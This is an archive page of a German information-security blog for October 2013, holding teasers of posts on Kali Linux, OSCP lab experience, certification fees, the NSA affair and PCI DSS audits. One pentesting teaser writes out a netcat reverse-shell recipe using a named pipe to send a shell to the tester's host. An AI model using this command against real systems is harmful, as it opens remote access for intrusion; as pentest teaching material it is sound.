• Über uns
    • Dominik Sauer
    • Patrick Sauer
  • Impressum / Datenschutzerklärung
InfoSec Blog

Patrick Sauer & Dominik Sauer

Month: Oktober 2013

Unprivilegierter User-Account in Kali Linux

31. Oktober 2013 by Patrick Sauer Leave a Comment

So direkt kann ich nicht nachvollziehen, warum Backtrack bzw. jetzt Kali Linux ihre Penetration Tester konsequent als root arbeiten lassen. Ein unprivilegierter User-Account und die Nutzung von sudo wären meiner Ansicht nach die bessere Wahl. Man benutzt schließlich als Sicherheitsspezialist eine Linux-Distribution, die genauso angegriffen werden kann wie man selbst Systeme angreift. Einen lokalen Nutzer … [Read more…]

Posted in: Pentesting Tagged: Backtrack, kali

Remote-Shell mit Netcat ohne „-e“ exec

28. Oktober 2013 by Patrick Sauer Leave a Comment

Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe: kali# nc -nvlp 4444 host# mknod /tmp/pipe p host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die … [Read more…]

Posted in: Pentesting Tagged: kali, nc, netcat

Erfahrungen zum OSCP: Teil 5 Es zieht sich.

27. Oktober 2013 by Patrick Sauer Leave a Comment

Mein aktueller Stand: 5x privilegierte Rechte 6x unprivilegierte Rechte Freischaltung DEV- und IT-Netz Es zieht sich etwas. Das Labor ist enorm groß. Manchmal hat man eine gute Idee und ein wenig Glück, sodass eine Maschine schnell gerootet ist. Dafür rennt man bei anderen Maschinen Angriffsvektoren hinterher, die nicht zu funktionieren scheinen. Es fühlt sich ein … [Read more…]

Posted in: Pentesting Tagged: Erfahrungsbericht, OSCP

Der jährliche Preis von CISSP und CISM im Vergleich

25. Oktober 2013 by Patrick Sauer Leave a Comment

Ich habe heute die jährlichen Gebühren für den CISSP von Isc² und für den CISM von ISACA beglichen. Zum Erhalt der Zertifizierung reicht dies natürlich nicht, da noch der Nachweis von jährlichen CPEs (Continuous Professional Education) zu erbringen ist. Unabhängig davon möchte der Isc² für den CISSP $85 Maintenance Fee. Das kann man nun als … [Read more…]

Posted in: Unkategorisiert Tagged: CISM, CISSP

Der NSA-Skandal als Security Awareness-Kampagne

25. Oktober 2013 by Patrick Sauer Leave a Comment

Vielen Dank liebe NSA für diese herausragende Security Awareness-Kampagne in der deutschen Bevölkerung. Erst am Anfang einmal starke Aufmerksamkeit erwecken, dass unverschlüsselte Kommunikation abgehört werden kann. Korrektur, wird. Die meisten Deutschen wissen nun, dass die NSA durch PRISM mitlesen kann, wenn sie möchte. So arbeitet man klar heraus, warum man z.B. bei vertraulicher Kommunikation Verschlüsselung … [Read more…]

Posted in: Informationssicherheit Tagged: Ironie, NSA, PRISM, Verschlüsselung

Passwortrichtlinien bei 1&1 VServer Initialisierung

18. Oktober 2013 by Patrick Sauer Leave a Comment

Ich habe einen VServer bei 1&1 geordert, der direkt mit Centos aufgesetzt wurde. Nachdem ich persönlich eine andere Distribution bevorzuge, wollte ich ihn neu initialisieren lassen. Vor der Initialisierung kann man ein neues Initialpasswort festlegen. Gesagt, getan: Ja natürlich, wie kann ich nur auf die Idee kommen ein Passwort länger als 12 Zeichen zu benutzen. … [Read more…]

Posted in: Unkategorisiert Tagged: Passwörter

Erfahrungen zum OSCP: Teil 4 Reverten tut gut

17. Oktober 2013 by Patrick Sauer Leave a Comment

Über das eigene Labpanel kann man beim OSCP Server in ihren Ausgangszustand zurückversetzen (reverten). Man kann zwar selbst jeden Tag nur eine begrenzte Anzahl von Servern reverten, dennoch lohnt es sich, dieses vor einem Angriff durchzuführen. Andere OSCP-Studenten hinterlassen eventuell defekte Applikationen oder Files wie Webshells, die einen eigenen Angriff entweder beeinträchtigen können oder zumindest … [Read more…]

Posted in: Pentesting Tagged: Erfahrungsbericht, OSCP

Erfahrungsbericht zu Google Apps for Business

15. Oktober 2013 by Patrick Sauer Leave a Comment

Ich nutze seit ein paar Monaten Google Apps for Business. Davon insbesondere Mail, Drive, Kalender, und Kontakte. Die anderen verfügbaren Apps nur gelegentlich oder gar nicht. Ich zahle aktuell etwas unter 5€ für jeden Nutzer pro Monat. Das Beste vorweg: Mail, Drive, Kalender & Co funktionieren zuverlässig, auch wenn in der Startphase mein eigener Account … [Read more…]

Posted in: Unkategorisiert Tagged: Erfahrungsbericht

Erfahrungen zum OSCP: Teil 3 Erste Bilanz

13. Oktober 2013 by Patrick Sauer Leave a Comment

Meine erste Bilanz: 1x Windows (privilegierte Rechte) 5x Linux (unprivilegierte Rechte) Freischaltung DEV-Netz Ich habe schon in vielen Berichten gelesen, wie steil die Lernkurve beim OSCP ist und wie umfangreich der Kurs. Jetzt kann ich es nachvollziehen. Es stimmt auch, dass der OSCP in keiner Art und Weise vergleichbar mit anderen Sicherheitszertifizierungen ist. Während man … [Read more…]

Posted in: Pentesting Tagged: Erfahrungsbericht, OSCP

Der richtige Umgang mit QSAs / Auditoren für PCI DSS

12. Oktober 2013 by Patrick Sauer Leave a Comment

Letztens habe ich für einen Kunden wiederholt den Audit begleitet und erfolgreich abgeschlossen. Ich möchte an dieser Stelle betonen, wie wichtig der richtige Umgang mit dem QSA ist. In manchen (vielleicht auch vielen?) Unternehmen wird der QSA als Feind gesehen, er ist der „böse Auditor“. Das stimmt so nicht und ist auch ein Fehler. Ein … [Read more…]

Posted in: PCI DSS Tagged: Audit, QSA
1 2 Weiter »

Sprachen

  • Deutsch
    • English

Search

Categories

  • binsec
  • binsec.academy
  • binsec.tools
  • Informationssicherheit
  • IT-Forensik
  • IT-Sicherheit
  • Lehraufträge
  • Netzpolitik
  • PCI DSS
  • Pentest Collective
  • Pentesting
  • Presse
  • Regulatorik
  • Studium
  • Unkategorisiert
  • Vorlesung
    • HDA
    • THB
    • THM
  • Vorträge

Copyright © 2026 InfoSec Blog.

Omega WordPress Theme by ThemeHall

  • Deutsch
  • English (Englisch)